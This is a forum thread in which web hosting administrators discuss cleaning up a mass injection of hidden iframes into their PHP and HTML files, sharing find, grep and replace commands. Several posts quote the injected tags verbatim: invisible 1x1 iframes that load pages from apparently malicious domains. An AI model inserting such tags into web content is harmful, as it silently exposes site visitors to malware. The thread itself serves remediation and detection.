The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Need help removing tag from thousands of files

Discussion in 'General Discussion' started by ccccanada, Dec 21, 2006.

  1. ccccanada

    ccccanada Well-Known Member

    Joined:
    Jan 17, 2003
    Messages:
    279
    Likes Received:
    0
    Trophy Points:
    16
    Hello!

    Somehow on Aug 21 some hacker was able to compromise one of our servers and placed the following tag at the end of the page on tens of thousands of php and html documents both inside and outside of the /home directory.

    <iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>

    Since all the files that where affected where changed on the same day I was able with the following commands to get lists of affected documents on the server.

    find / -perm 766 -exec ls -al {} \; | grep "Aug 21" > files766.txt

    find / -perm 666 -exec ls -al {} \; | grep "Aug 21" > files666.txt

    find / -perm 777 -exec ls -al {} \; | grep "Aug 21" > files777.txt

    The above comand makes a text file with a list of all documents changed on that day and with certain permissions set and places in in the directory from where you ran the comand.

    However now I am looking for help to find out if someone knows a command that will delete the line from all affected documents without me having to spend a month doing it manually.

    If anyone can help it would be greatly appreciated.

    Thanks
    Harold
     
  2. Murtaza_t

    Murtaza_t Well-Known Member

    Joined:
    Jan 24, 2005
    Messages:
    476
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Earth
    cPanel Access Level:
    Website Owner
    This will help you:

    Code:
    #!/bin/bash
    
    find / -type f -name *.php -exec replace '<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>' '' -- {} > /dev/null \;
    
    echo "Removed Tag from PHP file"
    
    find / -type f -name *.html -exec replace '<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>'  '' -- {} > /dev/null \;
    
    echo "Removed Tag from HTML file"
    
    find / -type f -name *.htm -exec replace '<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>' '' -- {} > /dev/null \;
    
    echo "Removed Tag from ALL files"
    
    echo "Murtaza was here"
    
    exit
    It will remove tags from all .php .html .htm

    NOTE: Please use it on your own risk.
     
  3. ccccanada

    ccccanada Well-Known Member

    Joined:
    Jan 17, 2003
    Messages:
    279
    Likes Received:
    0
    Trophy Points:
    16
    Thank you very much i will give it a try now.
     
  4. wkdwich

    wkdwich Well-Known Member

    Joined:
    Apr 11, 2005
    Messages:
    105
    Likes Received:
    0
    Trophy Points:
    16
    Have you found an effective means of keeping these ataccks from reoccuring??


     
  5. nick1

    nick1 Member

    Joined:
    May 21, 2006
    Messages:
    24
    Likes Received:
    0
    Trophy Points:
    1
    I've same issue and I see iframe codes as following in my lot of php and html files.

    '<iframe src='http://ccfelomvhk.com/dl/adv542.php' width=1 height=1></iframe>'

    Can anyone please help me to tell how to remove them?

    Thank you
     
  6. wkdwich

    wkdwich Well-Known Member

    Joined:
    Apr 11, 2005
    Messages:
    105
    Likes Received:
    0
    Trophy Points:
    16
    please see:
    http://forums.cpanel.net/showpost.php?p=361256&postcount=157
     
  7. nick1

    nick1 Member

    Joined:
    May 21, 2006
    Messages:
    24
    Likes Received:
    0
    Trophy Points:
    1
    Thank you but right now I need to know how could i remove these codes,

    they are encypted format like

    #&449;#456&;

    when I post those codes here I saw it become as following

    '<iframe src='http://ccfelomvhk.com/dl/adv542.php' width=1 height=1></iframe>'


    :s
     
  8. wkdwich

    wkdwich Well-Known Member

    Joined:
    Apr 11, 2005
    Messages:
    105
    Likes Received:
    0
    Trophy Points:
    16

    depending on where the codes are:
    regular html files
    regular php files
    inside a database

    you can just upload your local versions to the site again and that should make things ok.. unless they are embedded in the database, then you may have to to to phpmyadmin and manully sreach and hand edit.. but as soon as you do that, stop your life and clean house.. local and remote
     
  9. nick1

    nick1 Member

    Joined:
    May 21, 2006
    Messages:
    24
    Likes Received:
    0
    Trophy Points:
    1
    iframe codes are in php and html files not in database so I think if I know the script I could remove them.

    The issue is I don't have the backup for those files currently :(
     
  10. wkdwich

    wkdwich Well-Known Member

    Joined:
    Apr 11, 2005
    Messages:
    105
    Likes Received:
    0
    Trophy Points:
    16


    Then you will have to save them locally, clean and reupload, it might be faster than using the file manager tool in the cpanel admin

    how many files are you talking about?? do you have root SSH access?
     
  11. nick1

    nick1 Member

    Joined:
    May 21, 2006
    Messages:
    24
    Likes Received:
    0
    Trophy Points:
    1
    18 domains :( so you can imagine php and html files. Yes I've root access
     
  12. wkdwich

    wkdwich Well-Known Member

    Joined:
    Apr 11, 2005
    Messages:
    105
    Likes Received:
    0
    Trophy Points:
    16
    check this thread.. its a biggie

    http://forums.cpanel.net/showpost.php?p=343535&postcount=422

    thats the only one I can find now.. and all it does is tell you which files were injected, you still have to manually repair them
     
  13. nick1

    nick1 Member

    Joined:
    May 21, 2006
    Messages:
    24
    Likes Received:
    0
    Trophy Points:
    1
    thanks, I'm afraid to modify search iframe string :( what should I mention there :s
     
  14. wkdwich

    wkdwich Well-Known Member

    Joined:
    Apr 11, 2005
    Messages:
    105
    Likes Received:
    0
    Trophy Points:
    16
    What I suggest is you use that tool (or the method I show below) to search the public_html directores of all the domains.. so if your server is set up like mine anything in
    /home/

    make a list of the files, then one by one.. sorry but if you have no local copies it has to be this way..

    pico -w [filename]

    you may or may not have pico.. you can use whatever editor you are familiar with.. but just delete anything from the < iframe > to and including the < /ifrmae > tag, save and close

    You can try the method Murtaza_t suggested, but I have not tested that and I would not trust it personally..


    the method I used:
    I created a file on the server ftphack.txt that contained:
    grep -l 'iframe' /home/*/public_html/*.htm
    grep -l 'iframe' /home/*/public_html/*/*.htm
    grep -l 'iframe' /home/*/public_html/*/*/*.htm
    grep -l 'iframe' /home/*/public_html/*/*/*/*.htm
    grep -l 'iframe' /home/*/public_html/*/*/*/*/*.htm
    grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*.htm
    grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*/*.htm
    grep -l 'iframe' /home/*/public_html/*.php
    grep -l 'iframe' /home/*/public_html/*/*.php
    grep -l 'iframe' /home/*/public_html/*/*/*.php
    grep -l 'iframe' /home/*/public_html/*/*/*/*.php
    grep -l 'iframe' /home/*/public_html/*/*/*/*/*.php
    grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*.php
    grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*/*.php
    grep -l 'iframe' /home/*/public_html/*.html
    grep -l 'iframe' /home/*/public_html/*/*.html
    grep -l 'iframe' /home/*/public_html/*/*/*.html
    grep -l 'iframe' /home/*/public_html/*/*/*/*.html
    grep -l 'iframe' /home/*/public_html/*/*/*/*/*.html
    grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*.html
    grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*/*.html


    and I ran it from the command line with output.. now I could see every file that contained iframe in it and knew what I had to repair

    your milage may vary and you may have to change the paths depending on your OS, but this worked very well for me.. and you need to hurry here.. the longer these files stay infeted the more ste visitors are getting infected the more this circle will continue to grow.. we have to stop this maddness!!

    Last I suggest highly you get your PC looked at by a very qualified professional to make sure it is clean from any keyloggers or other critters.. install KeyScrambler on your local PC, change ALL the passwords on the server AFTER you have done all that locally.. if you have a keylogger on your PC you can change the passwords till you are purple.. they will keep tabs and stay updated.. If the keylogger on your system was the issue you shoud be good now.. if not you MUST contact your host people and ask them to thoroughly investigate if there are other domains on the server that were hit also to determine if it was a single issue or a server compromise.


    oh and after all that is done, get everything copied locally.., you could have been done with this by now :)

    Oh and if you do run any databases use phpmyadmin and search there for iframes to make sure its not in there too..
     
    #14 wkdwich, Apr 22, 2008
    Last edited: Apr 22, 2008
  15. brianoz

    brianoz Well-Known Member

    Joined:
    Mar 13, 2004
    Messages:
    1,146
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    Melbourne, Australia
    cPanel Access Level:
    Root Administrator
    A little more sophistication ...
    Code:
    find /home -name '*.php' -o -name '*.htm*' | xargs grep -l  iframe /dev/null
    Works on infinite depth, and when /home is too big to expand '*'.

    You can do a global replace if you use the exact string, with the replace command (think it's actually part of MySql):

    replace old new -- filelist

    You'd have to get the iframe code exact and this would only work if it is all on one line.
     
  16. nick1

    nick1 Member

    Joined:
    May 21, 2006
    Messages:
    24
    Likes Received:
    0
    Trophy Points:
    1
    very nice, thank you
     
  17. mesranet

    mesranet Well-Known Member

    Joined:
    May 6, 2002
    Messages:
    126
    Likes Received:
    0
    Trophy Points:
    16
    Hi,

    Today one of my client effected with iframe to all .html file, the code as below:

    <iframe src="http://peskostruikaz.com/?click=5364991" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
    <iframe src="http://peskostruikaz.com/?click=537207C" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

    Is it any solution by using 'find' to remove all those thing and the problem is on 'click=537207C' is a running number

    Please help
     
Loading...

Share This Page